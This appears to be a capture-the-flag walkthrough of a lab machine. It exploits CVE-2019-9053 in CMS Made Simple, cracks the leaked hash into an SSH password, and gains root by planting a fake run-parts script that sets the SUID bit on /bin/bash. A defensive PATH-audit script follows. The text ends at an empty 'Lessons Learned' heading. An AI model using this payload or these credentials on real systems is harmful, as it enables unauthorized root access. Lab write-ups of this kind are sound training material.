This article walks through exploiting CVE-2019-9053 for penetration testing in a Linux environment. First, an Nmap scan is used to gather information about the target host, including its open SSH and HTTP ports. Next, visiting the web interface and the robots.txt file reveals the CMS in use. After exploiting the vulnerability to obtain user credentials, an SSH login succeeds. Then, by checking permissions, it is found that path hijacking can be used for privilege escalation, ultimately yielding root. Finally, the lessons learned during the process are summarized.

Information Gathering

# Nmap 7.98 scan initiated Mon Dec 29 13:52:07 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.10.138
Nmap scan report for 10.10.10.138
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:6.0
Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%), Linux 4.19 (90%), Linux 5.0 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 5.379 days (since Wed Dec 24 04:47:57 2025)
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 29 13:53:46 2025 -- 1 IP address (1 host up) scanned in 99.57 seconds

Vulnerability Analysis

Visiting the web site, then checking robots.txt, and finally browsing to http://writeup.htb/writeup/ shows that it runs CMS Made Simple - Copyright (C) 2004-2019. All rights reserved. Searching for "CMS Made Simple 2019" leads to CVE-2019-9053.

Exploitation (User Flag)

After running it, we get:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
➜  Writeup echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
->raykayjay9

Then ssh jkr@writeup.htb and enter raykayjay9.

Privilege Escalation (Root Flag)

jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

Membership in the staff group means full permissions on /usr/local.

jkr@writeup:~$ ls -ld /usr/local/bin
drwxrwsr-x 2 root staff 20480 Apr 19  2019 /usr/local/bin

Run pspy.

# At first I didn't find anything, but when we ssh into the target we can see:
2025/12/31 01:34:45 CMD: UID=0     PID=2265   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2025/12/31 01:34:45 CMD: UID=0     PID=2266   | run-parts --lsbsysinit /etc/update-motd.d

run-parts is looked up through PATH and executed as root, so path hijacking is possible.

jkr@writeup:~$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
jkr@writeup:~$ ls -la /usr/local/bin/run-parts
-rwxr-xr-x 1 jkr staff 33 Dec 31 01:39 /usr/local/bin/run-parts
jkr@writeup:~$ ls -ld /bin/bash
-rwxr-xr-x 1 root root 1099016 May 15  2017 /bin/bash

Now reconnect to the target to trigger our payload.

➜  Writeup ssh jkr@writeup.htb
jkr@writeup.htb's password:

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 31 01:34:46 2025 from 10.10.16.3
-bash-4.4$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1099016 May 15  2017 /bin/bash
-bash-4.4$ /bin/bash -p
bash-4.4# id
uid=1000(jkr) gid=1000(jkr) euid=0(root) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
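As an added defender-side check (not part of the original writeup), the bash audit below takes the PATH a privileged job runs with and answers two questions: which of those directories can a non-root user write to, and does an earlier directory already shadow the command the job expects. It assumes Linux `stat -c` and `readlink -f` (GNU coreutils or busybox); the PATH value is the one from the pspy output above, and the expected location /bin/run-parts is an assumption for a Debian-style system.

```shell
#!/usr/bin/env bash
# Added audit helper, not part of the original writeup. Given the PATH a
# privileged job runs with, it reports directories writable by group/others and
# whether the job's command is already shadowed earlier on that PATH.

# Print each directory on the PATH string $1 that is group- or world-writable,
# as "<dir> <octal mode> <owner>:<group>" (setgid/sticky bits are ignored).
writable_path_dirs() {
    local path="$1" dir mode
    local IFS=':'
    for dir in $path; do
        [ -d "$dir" ] || continue
        mode=$(stat -c '%a' "$dir")              # e.g. 2775 for /usr/local/bin
        if [ $(( 8#$mode & 8#022 )) -ne 0 ]; then # write bit for group or other
            printf '%s %s %s\n' "$dir" "$mode" "$(stat -c '%U:%G' "$dir")"
        fi
    done
}

# Resolve command $2 under PATH $1 the way sh/env do: first executable wins.
resolve_in_path() {
    local path="$1" name="$2" dir
    local IFS=':'
    for dir in $path; do
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# Compare what PATH resolves for $2 against the packaged binary $3.
# Prints OK / SHADOWED / MISSING; exit status is non-zero for a finding.
check_shadowing() {
    local path="$1" name="$2" expected="$3" found
    found=$(resolve_in_path "$path" "$name") || { echo "MISSING $name"; return 1; }
    # readlink -f so merged-/usr symlinks (/bin -> usr/bin) are not false positives
    if [ "$(readlink -f "$found")" != "$(readlink -f "$expected")" ]; then
        echo "SHADOWED $found (expected $expected)"
        return 2
    fi
    echo "OK $found"
}

# Demo against the PATH pspy showed for the root MOTD job on the target.
MOTD_PATH='/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
echo "== writable directories on the MOTD job's PATH, then run-parts resolution =="
writable_path_dirs "$MOTD_PATH"
check_shadowing "$MOTD_PATH" run-parts /bin/run-parts || true   # status only flags a finding
```

On the target this reports /usr/local/bin (mode 2775, root:staff) as group-writable, which is exactly the precondition the hijack above relied on; running it after login would also show run-parts resolving to the planted /usr/local/bin copy.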

Lessons Learned